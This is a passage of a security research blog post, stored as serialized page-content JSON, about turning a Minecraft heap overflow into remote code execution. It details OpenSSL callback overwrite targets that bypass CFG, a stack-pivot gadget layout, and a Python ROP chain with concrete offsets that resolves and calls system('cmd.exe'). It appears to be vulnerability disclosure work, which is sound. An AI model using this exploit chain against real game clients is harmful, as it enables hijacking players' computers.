0x10",{"type":33,"value":155128}," is loaded into ",{"type":28,"tag":98,"props":155130,"children":155132},{"className":155131},[],[155133],{"type":33,"value":155134},"rdx",{"type":33,"value":155136}," and then called directly.",{"type":28,"tag":29,"props":155138,"children":155139},{},[155140],{"type":33,"value":155141},"This code comes from OpenSSL, and none of the OpenSSL-specific sections contain CFG dispatch calls. Presumably OpenSSL was compiled without CFG and then statically linked into the executable.",{"type":28,"tag":29,"props":155143,"children":155144},{},[155145,155147,155152],{"type":33,"value":155146},"So the remaining task is to locate OpenSSL function or ",{"type":28,"tag":98,"props":155148,"children":155150},{"className":155149},[],[155151],{"type":33,"value":154549},{"type":33,"value":155153}," pointers within Minecraft's writable sections and use those as overwrite targets to hijack execution.",{"type":28,"tag":443,"props":155155,"children":155157},{"id":155156},"locating-overwrite-targets",[155158],{"type":33,"value":155159},"Locating Overwrite Targets",{"type":28,"tag":29,"props":155161,"children":155162},{},[155163,155165,155171,155172,155177,155179,155184,155186,155192],{"type":33,"value":155164},"One of the first targets we identified were the ",{"type":28,"tag":98,"props":155166,"children":155168},{"className":155167},[],[155169],{"type":33,"value":155170},"malloc",{"type":33,"value":10659},{"type":28,"tag":98,"props":155173,"children":155175},{"className":155174},[],[155176],{"type":33,"value":149783},{"type":33,"value":155178}," callbacks. These reside in the ",{"type":28,"tag":98,"props":155180,"children":155182},{"className":155181},[],[155183],{"type":33,"value":155019},{"type":33,"value":155185}," section and are invoked whenever they don’t match the expected ",{"type":28,"tag":98,"props":155187,"children":155189},{"className":155188},[],[155190],{"type":33,"value":155191},"OPENSSL_malloc/free",{"type":33,"value":131641},{"type":28,"tag":29,"props":155194,"children":155195},{},[155196],{"type":28,"tag":206,"props":155197,"children":155199},{"alt":50198,"src":155198},"/posts/minecraft-heap-overflow-to-rce/image13.png",[],{"type":28,"tag":29,"props":155201,"children":155202},{},[155203],{"type":33,"value":155204},"However, none of the registers held a pointer to a controllable region where we could place our ROP chain.",{"type":28,"tag":29,"props":155206,"children":155207},{},[155208,155210,155216,155218,155224,155226,155231],{"type":33,"value":155209},"Later, we found another promising function: ",{"type":28,"tag":98,"props":155211,"children":155213},{"className":155212},[],[155214],{"type":33,"value":155215},"ossl_ec_key_new_method_int",{"type":33,"value":155217},". This function creates and initializes an ",{"type":28,"tag":98,"props":155219,"children":155221},{"className":155220},[],[155222],{"type":33,"value":155223},"EC_KEY",{"type":33,"value":155225}," object. What makes it particularly interesting is that it relies on a global structure (in ",{"type":28,"tag":98,"props":155227,"children":155229},{"className":155228},[],[155230],{"type":33,"value":155019},{"type":33,"value":155232},") containing function pointers:",{"type":28,"tag":29,"props":155234,"children":155235},{},[155236],{"type":28,"tag":206,"props":155237,"children":155239},{"alt":50198,"src":155238},"/posts/minecraft-heap-overflow-to-rce/image14.png",[],{"type":28,"tag":29,"props":155241,"children":155242},{},[155243,155245,155251,155252,155258,155260,155265,155267,155273,155275,155280,155282,155287,155289,155294],{"type":33,"value":155244},"In the image above, ",{"type":28,"tag":98,"props":155246,"children":155248},{"className":155247},[],[155249],{"type":33,"value":155250},"ret->meth",{"type":33,"value":125107},{"type":28,"tag":98,"props":155253,"children":155255},{"className":155254},[],[155256],{"type":33,"value":155257},"default_ec_key_meth",{"type":33,"value":155259},", which points to a structure of function pointers located in ",{"type":28,"tag":98,"props":155261,"children":155263},{"className":155262},[],[155264],{"type":33,"value":155019},{"type":33,"value":155266},". It then calls ",{"type":28,"tag":98,"props":155268,"children":155270},{"className":155269},[],[155271],{"type":33,"value":155272},"ret->meth->init",{"type":33,"value":155274},", passing the ",{"type":28,"tag":98,"props":155276,"children":155278},{"className":155277},[],[155279],{"type":33,"value":17355},{"type":33,"value":155281}," pointer (",{"type":28,"tag":98,"props":155283,"children":155285},{"className":155284},[],[155286],{"type":33,"value":10657},{"type":33,"value":155288},"). This alone isn’t especially useful because ",{"type":28,"tag":98,"props":155290,"children":155292},{"className":155291},[],[155293],{"type":33,"value":10657},{"type":33,"value":155295}," is heap-allocated.",{"type":28,"tag":29,"props":155297,"children":155298},{},[155299,155301,155306],{"type":33,"value":155300},"But, if we look at how ",{"type":28,"tag":98,"props":155302,"children":155304},{"className":155303},[],[155305],{"type":33,"value":155272},{"type":33,"value":155307}," is invoked in the disassembly:",{"type":28,"tag":29,"props":155309,"children":155310},{},[155311],{"type":28,"tag":206,"props":155312,"children":155314},{"alt":50198,"src":155313},"/posts/minecraft-heap-overflow-to-rce/image15.png",[],{"type":28,"tag":29,"props":155316,"children":155317},{},[155318,155319,155324,155326,155331,155333,155338,155340,155345,155347,155352,155354,155359,155361,155366,155368,155374],{"type":33,"value":7151},{"type":28,"tag":98,"props":155320,"children":155322},{"className":155321},[],[155323],{"type":33,"value":155272},{"type":33,"value":155325}," is not ",{"type":28,"tag":98,"props":155327,"children":155329},{"className":155328},[],[155330],{"type":33,"value":54114},{"type":33,"value":155332},", it is called while ",{"type":28,"tag":98,"props":155334,"children":155336},{"className":155335},[],[155337],{"type":33,"value":56393},{"type":33,"value":155339}," still contains the value of ",{"type":28,"tag":98,"props":155341,"children":155343},{"className":155342},[],[155344],{"type":33,"value":155250},{"type":33,"value":155346}," - that is, a pointer to the structure in ",{"type":28,"tag":98,"props":155348,"children":155350},{"className":155349},[],[155351],{"type":33,"value":155019},{"type":33,"value":155353}," that we control. This is ideal, because we can overwrite ",{"type":28,"tag":98,"props":155355,"children":155357},{"className":155356},[],[155358],{"type":33,"value":155257},{"type":33,"value":155360}," with a pointer to a region in ",{"type":28,"tag":98,"props":155362,"children":155364},{"className":155363},[],[155365],{"type":33,"value":155019},{"type":33,"value":155367}," where our ROP chain is located, and then perform a stack pivot using a ",{"type":28,"tag":98,"props":155369,"children":155371},{"className":155370},[],[155372],{"type":33,"value":155373},"mov rsp, rax; ret",{"type":33,"value":155375},"-style gadget.",{"type":28,"tag":29,"props":155377,"children":155378},{},[155379,155381,155386,155388,155393],{"type":33,"value":155380},"Although we discovered that ",{"type":28,"tag":98,"props":155382,"children":155384},{"className":155383},[],[155385],{"type":33,"value":155215},{"type":33,"value":155387}," is never called by the Minecraft process, this did not turn out to be a problem as we had already found a way to trigger arbitrary function calls through the ",{"type":28,"tag":98,"props":155389,"children":155391},{"className":155390},[],[155392],{"type":33,"value":155191},{"type":33,"value":155394}," callbacks.",{"type":28,"tag":443,"props":155396,"children":155398},{"id":155397},"stack-pivot",[155399],{"type":33,"value":155400},"Stack Pivot",{"type":28,"tag":29,"props":155402,"children":155403},{},[155404,155406,155411,155413,155418,155420,155425,155427,155433],{"type":33,"value":155405},"At this point, the plan is as follows: write our ROP chain into a controlled region of ",{"type":28,"tag":98,"props":155407,"children":155409},{"className":155408},[],[155410],{"type":33,"value":155019},{"type":33,"value":155412},", overwrite ",{"type":28,"tag":98,"props":155414,"children":155416},{"className":155415},[],[155417],{"type":33,"value":155257},{"type":33,"value":155419}," to set up the stack pivot, and finally overwrite one of the callbacks so that calling it triggers ",{"type":28,"tag":98,"props":155421,"children":155423},{"className":155422},[],[155424],{"type":33,"value":155215},{"type":33,"value":155426},". This ultimately calls ",{"type":28,"tag":98,"props":155428,"children":155430},{"className":155429},[],[155431],{"type":33,"value":155432},"default_ec_key_meth->init",{"type":33,"value":155434},", which executes the pivot and begins ROP execution.",{"type":28,"tag":29,"props":155436,"children":155437},{},[155438,155440,155446,155448,155454],{"type":33,"value":155439},"We chose to overwrite the ",{"type":28,"tag":98,"props":155441,"children":155443},{"className":155442},[],[155444],{"type":33,"value":155445},"OPENSSL_free",{"type":33,"value":155447}," callback. This produces only a minor memory leak, while overwriting ",{"type":28,"tag":98,"props":155449,"children":155451},{"className":155450},[],[155452],{"type":33,"value":155453},"OPENSSL_malloc",{"type":33,"value":155455}," would require our replacement function to return a writable, unused memory region.",{"type":28,"tag":29,"props":155457,"children":155458},{},[155459,155461,155467,155468,155474,155476,155481],{"type":33,"value":155460},"For the stack pivot, we found two useful gadgets: ",{"type":28,"tag":98,"props":155462,"children":155464},{"className":155463},[],[155465],{"type":33,"value":155466},"add rsp, 0x10; pop r14; ret",{"type":33,"value":10659},{"type":28,"tag":98,"props":155469,"children":155471},{"className":155470},[],[155472],{"type":33,"value":155473},"xchg rsp, rax; ret",{"type":33,"value":155475},". The exploit writes them into ",{"type":28,"tag":98,"props":155477,"children":155479},{"className":155478},[],[155480],{"type":33,"value":155019},{"type":33,"value":155482}," like this:",{"type":28,"tag":234,"props":155484,"children":155486},{"code":155485},"      +-----------------------------+\n+0x00 | add rsp, 0x10; pop r14; ret |\n      +-----------------------------+\n+0x08 | padding                     |\n      +-----------------------------+\n+0x10 | xchg rsp, rax; ret          |\n      +-----------------------------+\n+0x18 | padding (pop r14)           |\n      +-----------------------------+\n+0x20 | ROP Chain                   |\n      +-----------------------------+\n",[155487],{"type":28,"tag":98,"props":155488,"children":155489},{"__ignoreMap":7},[155490],{"type":33,"value":155485},{"type":28,"tag":29,"props":155492,"children":155493},{},[155494,155496,155501,155503,155508,155510,155515,155517,155522,155524,155529,155531,155536,155538,155543],{"type":33,"value":155495},"The second gadget, ",{"type":28,"tag":98,"props":155497,"children":155499},{"className":155498},[],[155500],{"type":33,"value":155473},{"type":33,"value":155502},", is placed in the slot corresponding to the ",{"type":28,"tag":98,"props":155504,"children":155506},{"className":155505},[],[155507],{"type":33,"value":20404},{"type":33,"value":155509}," function pointer. As mentioned earlier, when ",{"type":28,"tag":98,"props":155511,"children":155513},{"className":155512},[],[155514],{"type":33,"value":155272},{"type":33,"value":155516}," is called, ",{"type":28,"tag":98,"props":155518,"children":155520},{"className":155519},[],[155521],{"type":33,"value":56393},{"type":33,"value":155523}," contains a pointer to ",{"type":28,"tag":98,"props":155525,"children":155527},{"className":155526},[],[155528],{"type":33,"value":155257},{"type":33,"value":155530}," - which we have overwritten and now points to our ",{"type":28,"tag":98,"props":155532,"children":155534},{"className":155533},[],[155535],{"type":33,"value":155466},{"type":33,"value":155537}," gadget in ",{"type":28,"tag":98,"props":155539,"children":155541},{"className":155540},[],[155542],{"type":33,"value":155019},{"type":33,"value":141},{"type":28,"tag":29,"props":155545,"children":155546},{},[155547,155549,155555,155557,155562,155564,155570,155572,155577,155579,155584,155586,155591,155593,155598,155600,155605,155607,155612],{"type":33,"value":155548},"When the call occurs, ",{"type":28,"tag":98,"props":155550,"children":155552},{"className":155551},[],[155553],{"type":33,"value":155554},"xchg rsp, rax",{"type":33,"value":155556}," swaps the stack pointer with this controlled pointer inside ",{"type":28,"tag":98,"props":155558,"children":155560},{"className":155559},[],[155561],{"type":33,"value":155019},{"type":33,"value":155563},", effectively moving ",{"type":28,"tag":98,"props":155565,"children":155567},{"className":155566},[],[155568],{"type":33,"value":155569},"rsp",{"type":33,"value":155571}," into our ROP region. After the ",{"type":28,"tag":98,"props":155573,"children":155575},{"className":155574},[],[155576],{"type":33,"value":10657},{"type":33,"value":155578},", execution continues at ",{"type":28,"tag":98,"props":155580,"children":155582},{"className":155581},[],[155583],{"type":33,"value":155466},{"type":33,"value":155585},", which advances ",{"type":28,"tag":98,"props":155587,"children":155589},{"className":155588},[],[155590],{"type":33,"value":155569},{"type":33,"value":155592}," by ",{"type":28,"tag":98,"props":155594,"children":155596},{"className":155595},[],[155597],{"type":33,"value":44158},{"type":33,"value":155599}," bytes, skipping over the padding and the ",{"type":28,"tag":98,"props":155601,"children":155603},{"className":155602},[],[155604],{"type":33,"value":155473},{"type":33,"value":155606}," gadget. From there, the stack pivot is complete and the ROP chain (placed above ",{"type":28,"tag":98,"props":155608,"children":155610},{"className":155609},[],[155611],{"type":33,"value":155473},{"type":33,"value":155613},") begins executing.",{"type":28,"tag":75,"props":155615,"children":155617},{"id":155616},"rop-chain",[155618],{"type":33,"value":155619},"ROP Chain",{"type":28,"tag":29,"props":155621,"children":155622},{},[155623,155625,155631,155633,155638],{"type":33,"value":155624},"For the demo, the ROP chain simply calls ",{"type":28,"tag":98,"props":155626,"children":155628},{"className":155627},[],[155629],{"type":33,"value":155630},"system(\"cmd.exe\")",{"type":33,"value":155632},". Because Minecraft does not use ",{"type":28,"tag":98,"props":155634,"children":155636},{"className":155635},[],[155637],{"type":33,"value":131365},{"type":33,"value":155639},", the symbol is not imported, so the chain must resolve it dynamically.",{"type":28,"tag":29,"props":155641,"children":155642},{},[155643,155645,155651,155653,155659,155661,155666,155668,155674,155676,155681],{"type":33,"value":155644},"This is straightforward: the chain first calls ",{"type":28,"tag":98,"props":155646,"children":155648},{"className":155647},[],[155649],{"type":33,"value":155650},"GetModuleHandle(\"ucrtbase.dll\")",{"type":33,"value":155652}," to obtain the base address of ",{"type":28,"tag":98,"props":155654,"children":155656},{"className":155655},[],[155657],{"type":33,"value":155658},"ucrtbase.dll",{"type":33,"value":155660}," (which exports ",{"type":28,"tag":98,"props":155662,"children":155664},{"className":155663},[],[155665],{"type":33,"value":131365},{"type":33,"value":155667},"). It then calls ",{"type":28,"tag":98,"props":155669,"children":155671},{"className":155670},[],[155672],{"type":33,"value":155673},"GetProcAddress(ucrtbase_addr, \"system\")",{"type":33,"value":155675}," to retrieve the function’s address. Finally, it invokes ",{"type":28,"tag":98,"props":155677,"children":155679},{"className":155678},[],[155680],{"type":33,"value":131365},{"type":33,"value":155682}," with the \"cmd.exe\" string.",{"type":28,"tag":29,"props":155684,"children":155685},{},[155686],{"type":33,"value":155687},"In the exploit script, the ROP chain looks something like this:",{"type":28,"tag":234,"props":155689,"children":155691},{"code":155690,"language":19124,"meta":7,"className":19125,"style":7},"# get the address of `GetModuleHandle` to `rax`\nrop.gadget(pop_r8)\nrop.gadget(addr_get_module_handle_a - 0x28)\n# 0x0000000145dcd83d : mov rax, qword ptr [r8 + 0x28] ; ret\nrop.gadget(mov_rax_r8_28)\n\n# call `GetModuleHandle(\"ucrtbase.dll\")`\nrop.gadget(pop_rcx)\nrop.gadget(0x7468B68) # offset of \"ucrtbase.dll\" string\nrop.gadget(ret) # movaps alignment\nrop.gadget(push_rax_ret) # calls `GetModuleHandle`\nrop.literal(u64(b\"ucrtbase\"))\nrop.literal(u64(b\".dll\\x00\\x00\\x00\\x00\"))\nrop.literal(u64(b\"system\\x00\\x00\"))\n\n# call `GetProcAddress(ucrtbase_base, \"system\")`\nrop.gadget(xchg_rcx_rax) # move the return value of `GetModuleHandle` to rcx\nrop.gadget(pop_rdx)\nrop.gadget(0x7468B68 + 0x10) # offset of \"system\" string\nrop.gadget(get_proc_addr)\n\n# call `system(\"cmd.exe\")`\nrop.gadget(pop_rcx)\nrop.gadget(0x7468DB8) # offset of \"cmd.exe\" string\nrop.gadget(ret) # movaps alignment\nrop.gadget(push_rax_ret) # calls `system`\nrop.literal(u64(b\"cmd.exe\\x00\"))\n",[155692],{"type":28,"tag":98,"props":155693,"children":155694},{"__ignoreMap":7},[155695,155703,155711,155736,155744,155752,155759,155767,155775,155802,155815,155828,155849,155878,155907,155914,155922,155935,155943,155979,155987,155994,156002,156009,156034,156045,156057],{"type":28,"tag":116,"props":155696,"children":155697},{"class":245,"line":246},[155698],{"type":28,"tag":116,"props":155699,"children":155700},{"style":250},[155701],{"type":33,"value":155702},"# get the address of `GetModuleHandle` to `rax`\n",{"type":28,"tag":116,"props":155704,"children":155705},{"class":245,"line":256},[155706],{"type":28,"tag":116,"props":155707,"children":155708},{"style":266},[155709],{"type":33,"value":155710},"rop.gadget(pop_r8)\n",{"type":28,"tag":116,"props":155712,"children":155713},{"class":245,"line":293},[155714,155719,155723,155728,155732],{"type":28,"tag":116,"props":155715,"children":155716},{"style":266},[155717],{"type":33,"value":155718},"rop.gadget(addr_get_module_handle_a ",{"type":28,"tag":116,"props":155720,"children":155721},{"style":370},[155722],{"type":33,"value":3996},{"type":28,"tag":116,"props":155724,"children":155725},{"style":376},[155726],{"type":33,"value":155727}," 0x",{"type":28,"tag":116,"props":155729,"children":155730},{"style":350},[155731],{"type":33,"value":134480},{"type":28,"tag":116,"props":155733,"children":155734},{"style":266},[155735],{"type":33,"value":2830},{"type":28,"tag":116,"props":155737,"children":155738},{"class":245,"line":361},[155739],{"type":28,"tag":116,"props":155740,"children":155741},{"style":250},[155742],{"type":33,"value":155743},"# 0x0000000145dcd83d : mov rax, qword ptr [r8 + 0x28] ; ret\n",{"type":28,"tag":116,"props":155745,"children":155746},{"class":245,"line":387},[155747],{"type":28,"tag":116,"props":155748,"children":155749},{"style":266},[155750],{"type":33,"value":155751},"rop.gadget(mov_rax_r8_28)\n",{"type":28,"tag":116,"props":155753,"children":155754},{"class":245,"line":400},[155755],{"type":28,"tag":116,"props":155756,"children":155757},{"emptyLinePlaceholder":19},[155758],{"type":33,"value":1044},{"type":28,"tag":116,"props":155760,"children":155761},{"class":245,"line":614},[155762],{"type":28,"tag":116,"props":155763,"children":155764},{"style":250},[155765],{"type":33,"value":155766},"# call `GetModuleHandle(\"ucrtbase.dll\")`\n",{"type":28,"tag":116,"props":155768,"children":155769},{"class":245,"line":631},[155770],{"type":28,"tag":116,"props":155771,"children":155772},{"style":266},[155773],{"type":33,"value":155774},"rop.gadget(pop_rcx)\n",{"type":28,"tag":116,"props":155776,"children":155777},{"class":245,"line":665},[155778,155783,155788,155793,155797],{"type":28,"tag":116,"props":155779,"children":155780},{"style":266},[155781],{"type":33,"value":155782},"rop.gadget(",{"type":28,"tag":116,"props":155784,"children":155785},{"style":376},[155786],{"type":33,"value":155787},"0x",{"type":28,"tag":116,"props":155789,"children":155790},{"style":350},[155791],{"type":33,"value":155792},"7468B68",{"type":28,"tag":116,"props":155794,"children":155795},{"style":266},[155796],{"type":33,"value":1609},{"type":28,"tag":116,"props":155798,"children":155799},{"style":250},[155800],{"type":33,"value":155801},"# offset of \"ucrtbase.dll\" string\n",{"type":28,"tag":116,"props":155803,"children":155804},{"class":245,"line":713},[155805,155810],{"type":28,"tag":116,"props":155806,"children":155807},{"style":266},[155808],{"type":33,"value":155809},"rop.gadget(ret) ",{"type":28,"tag":116,"props":155811,"children":155812},{"style":250},[155813],{"type":33,"value":155814},"# movaps alignment\n",{"type":28,"tag":116,"props":155816,"children":155817},{"class":245,"line":750},[155818,155823],{"type":28,"tag":116,"props":155819,"children":155820},{"style":266},[155821],{"type":33,"value":155822},"rop.gadget(push_rax_ret) ",{"type":28,"tag":116,"props":155824,"children":155825},{"style":250},[155826],{"type":33,"value":155827},"# calls `GetModuleHandle`\n",{"type":28,"tag":116,"props":155829,"children":155830},{"class":245,"line":779},[155831,155836,155840,155845],{"type":28,"tag":116,"props":155832,"children":155833},{"style":266},[155834],{"type":33,"value":155835},"rop.literal(u64(",{"type":28,"tag":116,"props":155837,"children":155838},{"style":376},[155839],{"type":33,"value":2893},{"type":28,"tag":116,"props":155841,"children":155842},{"style":563},[155843],{"type":33,"value":155844},"\"ucrtbase\"",{"type":28,"tag":116,"props":155846,"children":155847},{"style":266},[155848],{"type":33,"value":19376},{"type":28,"tag":116,"props":155850,"children":155851},{"class":245,"line":796},[155852,155856,155860,155865,155870,155874],{"type":28,"tag":116,"props":155853,"children":155854},{"style":266},[155855],{"type":33,"value":155835},{"type":28,"tag":116,"props":155857,"children":155858},{"style":376},[155859],{"type":33,"value":2893},{"type":28,"tag":116,"props":155861,"children":155862},{"style":563},[155863],{"type":33,"value":155864},"\".dll",{"type":28,"tag":116,"props":155866,"children":155867},{"style":1836},[155868],{"type":33,"value":155869},"\\x00\\x00\\x00\\x00",{"type":28,"tag":116,"props":155871,"children":155872},{"style":563},[155873],{"type":33,"value":2240},{"type":28,"tag":116,"props":155875,"children":155876},{"style":266},[155877],{"type":33,"value":19376},{"type":28,"tag":116,"props":155879,"children":155880},{"class":245,"line":847},[155881,155885,155889,155894,155899,155903],{"type":28,"tag":116,"props":155882,"children":155883},{"style":266},[155884],{"type":33,"value":155835},{"type":28,"tag":116,"props":155886,"children":155887},{"style":376},[155888],{"type":33,"value":2893},{"type":28,"tag":116,"props":155890,"children":155891},{"style":563},[155892],{"type":33,"value":155893},"\"system",{"type":28,"tag":116,"props":155895,"children":155896},{"style":1836},[155897],{"type":33,"value":155898},"\\x00\\x00",{"type":28,"tag":116,"props":155900,"children":155901},{"style":563},[155902],{"type":33,"value":2240},{"type":28,"tag":116,"props":155904,"children":155905},{"style":266},[155906],{"type":33,"value":19376},{"type":28,"tag":116,"props":155908,"children":155909},{"class":245,"line":898},[155910],{"type":28,"tag":116,"props":155911,"children":155912},{"emptyLinePlaceholder":19},[155913],{"type":33,"value":1044},{"type":28,"tag":116,"props":155915,"children":155916},{"class":245,"line":907},[155917],{"type":28,"tag":116,"props":155918,"children":155919},{"style":250},[155920],{"type":33,"value":155921},"# call `GetProcAddress(ucrtbase_base, \"system\")`\n",{"type":28,"tag":116,"props":155923,"children":155924},{"class":245,"line":981},[155925,155930],{"type":28,"tag":116,"props":155926,"children":155927},{"style":266},[155928],{"type":33,"value":155929},"rop.gadget(xchg_rcx_rax) ",{"type":28,"tag":116,"props":155931,"children":155932},{"style":250},[155933],{"type":33,"value":155934},"# move the return value of `GetModuleHandle` to rcx\n",{"type":28,"tag":116,"props":155936,"children":155937},{"class":245,"line":1011},[155938],{"type":28,"tag":116,"props":155939,"children":155940},{"style":266},[155941],{"type":33,"value":155942},"rop.gadget(pop_rdx)\n",{"type":28,"tag":116,"props":155944,"children":155945},{"class":245,"line":1029},[155946,155950,155954,155958,155962,155966,155970,155974],{"type":28,"tag":116,"props":155947,"children":155948},{"style":266},[155949],{"type":33,"value":155782},{"type":28,"tag":116,"props":155951,"children":155952},{"style":376},[155953],{"type":33,"value":155787},{"type":28,"tag":116,"props":155955,"children":155956},{"style":350},[155957],{"type":33,"value":155792},{"type":28,"tag":116,"props":155959,"children":155960},{"style":370},[155961],{"type":33,"value":2258},{"type":28,"tag":116,"props":155963,"children":155964},{"style":376},[155965],{"type":33,"value":155727},{"type":28,"tag":116,"props":155967,"children":155968},{"style":350},[155969],{"type":33,"value":88871},{"type":28,"tag":116,"props":155971,"children":155972},{"style":266},[155973],{"type":33,"value":1609},{"type":28,"tag":116,"props":155975,"children":155976},{"style":250},[155977],{"type":33,"value":155978},"# offset of \"system\" string\n",{"type":28,"tag":116,"props":155980,"children":155981},{"class":245,"line":1038},[155982],{"type":28,"tag":116,"props":155983,"children":155984},{"style":266},[155985],{"type":33,"value":155986},"rop.gadget(get_proc_addr)\n",{"type":28,"tag":116,"props":155988,"children":155989},{"class":245,"line":1047},[155990],{"type":28,"tag":116,"props":155991,"children":155992},{"emptyLinePlaceholder":19},[155993],{"type":33,"value":1044},{"type":28,"tag":116,"props":155995,"children":155996},{"class":245,"line":1071},[155997],{"type":28,"tag":116,"props":155998,"children":155999},{"style":250},[156000],{"type":33,"value":156001},"# call `system(\"cmd.exe\")`\n",{"type":28,"tag":116,"props":156003,"children":156004},{"class":245,"line":1137},[156005],{"type":28,"tag":116,"props":156006,"children":156007},{"style":266},[156008],{"type":33,"value":155774},{"type":28,"tag":116,"props":156010,"children":156011},{"class":245,"line":1181},[156012,156016,156020,156025,156029],{"type":28,"tag":116,"props":156013,"children":156014},{"style":266},[156015],{"type":33,"value":155782},{"type":28,"tag":116,"props":156017,"children":156018},{"style":376},[156019],{"type":33,"value":155787},{"type":28,"tag":116,"props":156021,"children":156022},{"style":350},[156023],{"type":33,"value":156024},"7468DB8",{"type":28,"tag":116,"props":156026,"children":156027},{"style":266},[156028],{"type":33,"value":1609},{"type":28,"tag":116,"props":156030,"children":156031},{"style":250},[156032],{"type":33,"value":156033},"# offset of \"cmd.exe\" string\n",{"type":28,"tag":116,"props":156035,"children":156036},{"class":245,"line":1212},[156037,156041],{"type":28,"tag":116,"props":156038,"children":156039},{"style":266},[156040],{"type":33,"value":155809},{"type":28,"tag":116,"props":156042,"children":156043},{"style":250},[156044],{"type":33,"value":155814},{"type":28,"tag":116,"props":156046,"children":156047},{"class":245,"line":1254},[156048,156052],{"type":28,"tag":116,"props":156049,"children":156050},{"style":266},[156051],{"type":33,"value":155822},{"type":28,"tag":116,"props":156053,"children":156054},{"style":250},[156055],{"type":33,"value":156056},"# calls `system`\n",{"type":28,"tag":116,"props":156058,"children":156059},{"class":245,"line":1262},[156060,156064,156068,156073,156078,156082],{"type":28,"tag":116,"props":156061,"children":156062},{"style":266},[156063],{"type":33,"value":155835},{"type":28,"tag":116,"props":156065,"children":156066},{"style":376},[156067],{"type":33,"value":2893},{"type":28,"tag":116,"props":156069,"children":156070},{"style":563},[156071],{"type":33,"value":156072},"\"cmd.exe",{"type":28,"tag":116,"props":156074,"children":156075},{"style":1836},[156076],{"type":33,"value":156077},"\\x00",{"type":28,"tag":116,"props":156079,"children":156080},{"style":563},[156081],{"type":33,"value":2240},{"type":28,"tag":116,"props":156083,"children":156084},{"style":266},[156085],{"type":33,"value":19376},{"type":28,"tag":75,"props":156087,"children":156089},{"id":156088},"demo",[156090],{"type":33,"value":156091},"Demo",{"type":28,"tag":29,"props":156093,"children":156094},{},[156095],{"type":33,"value":156096},"The demo video below shows a Molang script achieving arbitrary read and write primitives to execute the previous ROP chain:",{"type":28,"tag":1318,"props":156098,"children":156101},{"className":156099,"controls":19},[141436,156100],"blog-video-wide",[156102,156103,156107],{"type":33,"value":141439},{"type":28,"tag":140675,"props":156104,"children":156106},{"src":156105,"type":131469},"/posts/minecraft-heap-overflow-to-rce/demo.mp4",[],{"type":33,"value":141445},{"type":28,"tag":63,"props":156109,"children":156110},{"id":2506},[156111],{"type":33,"value":2509},{"type":28,"tag":29,"props":156113,"children":156114},{},[156115],{"type":33,"value":156116},"This blog post is quite long, which reflects how modern mitigations make remote exploitation highly cumbersome - but still not impossible.",{"type":28,"tag":29,"props":156118,"children":156119},{},[156120],{"type":33,"value":156121},"It also demonstrates an interesting technique of abusing Molang to achieve RCE without relying on client information leaks.",{"type":28,"tag":29,"props":156123,"children":156124},{},[156125],{"type":33,"value":156126},"Finally, it highlights an underexplored area in security: video games. Even massively popular games like Minecraft contain large, complex, and unexplored attack surfaces.",{"type":28,"tag":2516,"props":156128,"children":156129},{},[156130],{"type":33,"value":2520},{"title":7,"searchDepth":256,"depth":256,"links":156132},[156133,156137,156142,156153],{"id":146794,"depth":256,"text":146797,"children":156134},[156135,156136],{"id":146829,"depth":293,"text":146832},{"id":146845,"depth":293,"text":146848},{"id":146866,"depth":256,"text":146869,"children":156138},[156139,156140,156141],{"id":146882,"depth":293,"text":146885},{"id":146970,"depth":293,"text":146973},{"id":149270,"depth":293,"text":149273},{"id":5090,"depth":256,"text":5093,"children":156143},[156144,156145,156146,156147,156148,156149,156150,156151,156152],{"id":149377,"depth":293,"text":149380},{"id":149402,"depth":293,"text":149405},{"id":149539,"depth":293,"text":149542},{"id":151702,"depth":293,"text":151705},{"id":152064,"depth":293,"text":152067},{"id":152884,"depth":293,"text":152887},{"id":154998,"depth":293,"text":155001},{"id":155616,"depth":293,"text":155619},{"id":156088,"depth":293,"text":156091},{"id":2506,"depth":256,"text":2509},"content:blog:2026-06-02-minecraft-heap-overflow-to-rce.md","blog/2026-06-02-minecraft-heap-overflow-to-rce.md","blog/2026-06-02-minecraft-heap-overflow-to-rce",{"_path":4,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":8,"description":9,"date":10,"author":156158,"image":156159,"isFeatured":19,"onBlogPage":19,"tags":156160,"body":156161,"_type":2534,"_id":2535,"_source":2536,"_file":2537,"_stem":2538,"_extension":2539},[12,13,14],{"src":16,"width":17,"height":18},[21,22,23],{"type":25,"children":156162,"toc":158261},[156163,156167,156171,156175,156179,156183,156187,156191,156195,156199,156215,156226,156242,156252,156256,156266,156273,156277,156281,156285,156291,156307,156439,156443,156447,156451,156455,156465,156469,156473,156488,157843,157847,157851,157861,157867,157871,157875,157891,157897,157901,157904,157908,157923,157927,157931,157941,158203,158225,158235,158239,158249,158253,158257],{"type":28,"tag":29,"props":156164,"children":156165},{},[156166],{"type":33,"value":34},{"type":28,"tag":29,"props":156168,"children":156169},{},[156170],{"type":33,"value":39},{"type":28,"tag":41,"props":156172,"children":156173},{"id":43},[156174],{"type":33,"value":46},{"type":28,"tag":29,"props":156176,"children":156177},{},[156178],{"type":33,"value":51},{"type":28,"tag":29,"props":156180,"children":156181},{},[156182],{"type":33,"value":56},{"type":28,"tag":29,"props":156184,"children":156185},{},[156186],{"type":33,"value":61},{"type":28,"tag":63,"props":156188,"children":156189},{"id":65},[156190],{"type":33,"value":68},{"type":28,"tag":29,"props":156192,"children":156193},{},[156194],{"type":33,"value":73},{"type":28,"tag":75,"props":156196,"children":156197},{"id":77},[156198],{"type":33,"value":80},{"type":28,"tag":29,"props":156200,"children":156201},{},[156202,156203,156208,156209,156214],{"type":33,"value":85},{"type":28,"tag":87,"props":156204,"children":156206},{"href":89,"rel":156205},[91],[156207],{"type":33,"value":94},{"type":33,"value":96},{"type":28,"tag":98,"props":156210,"children":156212},{"className":156211},[],[156213],{"type":33,"value":103},{"type":33,"value":105},{"type":28,"tag":107,"props":156216,"children":156217},{},[156218],{"type":28,"tag":29,"props":156219,"children":156220},{},[156221,156222,156225],{"type":33,"value":114},{"type":28,"tag":116,"props":156223,"children":156224},{},[],{"type":33,"value":120},{"type":28,"tag":29,"props":156227,"children":156228},{},[156229,156230,156235,156236,156241],{"type":33,"value":125},{"type":28,"tag":98,"props":156231,"children":156233},{"className":156232},[],[156234],{"type":33,"value":131},{"type":33,"value":133},{"type":28,"tag":98,"props":156237,"children":156239},{"className":156238},[],[156240],{"type":33,"value":139},{"type":33,"value":141},{"type":28,"tag":29,"props":156243,"children":156244},{},[156245,156246,156251],{"type":33,"value":146},{"type":28,"tag":87,"props":156247,"children":156249},{"href":149,"rel":156248},[91],[156250],{"type":33,"value":153},{"type":33,"value":155},{"type":28,"tag":75,"props":156253,"children":156254},{"id":158},[156255],{"